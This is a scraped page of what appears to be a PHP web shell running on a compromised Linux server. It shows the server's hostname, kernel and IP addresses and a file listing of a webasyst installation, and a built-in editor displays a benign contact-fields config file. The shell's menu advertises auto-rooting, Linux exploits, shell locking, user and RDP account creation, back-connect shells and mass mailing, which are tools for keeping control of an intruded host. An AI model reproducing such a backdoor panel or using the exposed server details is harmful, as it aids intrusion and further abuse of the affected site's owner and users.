Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
webasyst /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
?;
php82
[ DIR ]
drwxr-xr-x
.htaccess
14
B
-rw-r--r--
SystemConfig.class.php
157
B
-rw-r--r--
_.htaccess
1.49
KB
-rw-r--r--
_htaccess
142
B
-rw-r--r--
_thumb.php
193
B
-rw-r--r--
all_fields_order.php
398
B
-rw-r--r--
apps.php
237
B
-rw-r--r--
company_fields_order.php
567
B
-rw-r--r--
config.php
158
B
-rw-r--r--
custom_fields.php
29.3
KB
-rw-r--r--
db.php
271
B
-rw-r--r--
edit.php
4.22
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
189
B
-rw-r--r--
import.php
2.89
KB
-rw-r--r--
info.xml
3.42
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
15.41
KB
-rw-r--r--
install.xml
1007
B
-rw-r--r--
mail.php
81
B
-rw-r--r--
md5
3.5
KB
-rw-r--r--
notes.txt
1.28
KB
-rw-r--r--
person_fields_order.php
1.52
KB
-rw-r--r--
plugins.php
95
B
-rw-r--r--
robots.txt
214
B
-rw-r--r--
routing.php
1.25
KB
-rw-r--r--
search.php
34.87
KB
-rw-r--r--
services.php
3.76
KB
-rw-r--r--
thumb.php
187
B
-rw-r--r--
update_antibot.php
2.67
KB
-rw-r--r--
waid.php
615
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : person_fields_order.php
<?php return array ( 'name' => array ( 'allow_self_edit' => 1, 'required' => true, 'unique' => NULL, ), 'title' => array ( 'allow_self_edit' => 1, 'required' => NULL, 'unique' => NULL, ), 'firstname' => array ( 'allow_self_edit' => 1, 'required' => NULL, 'unique' => NULL, ), 'middlename' => array ( 'allow_self_edit' => 1, 'required' => NULL, 'unique' => NULL, ), 'lastname' => array ( 'allow_self_edit' => 1, 'required' => NULL, 'unique' => NULL, ), 'jobtitle' => array ( 'allow_self_edit' => 1, 'required' => NULL, 'unique' => NULL, ), 'company' => array ( 'allow_self_edit' => 1, 'required' => NULL, 'unique' => NULL, ), 'email' => array ( 'allow_self_edit' => 1, 'required' => NULL, 'unique' => NULL, ), 'phone' => array ( 'allow_self_edit' => 1, 'required' => NULL, 'unique' => NULL, ), 'company_contact_id' => array ( 'allow_self_edit' => 1, ), 'sex' => array ( 'allow_self_edit' => 1, ), 'im' => array ( 'allow_self_edit' => 1, ), 'address' => array ( 'allow_self_edit' => 1, ), 'url' => array ( 'allow_self_edit' => 1, ), 'birthday' => array ( 'allow_self_edit' => 1, ), 'locale' => array ( 'allow_self_edit' => 1, ), 'timezone' => array ( 'allow_self_edit' => 1, ), 'socialnetwork' => array ( 'allow_self_edit' => 1, ), 'about' => array ( 'allow_self_edit' => 1, ), );
Close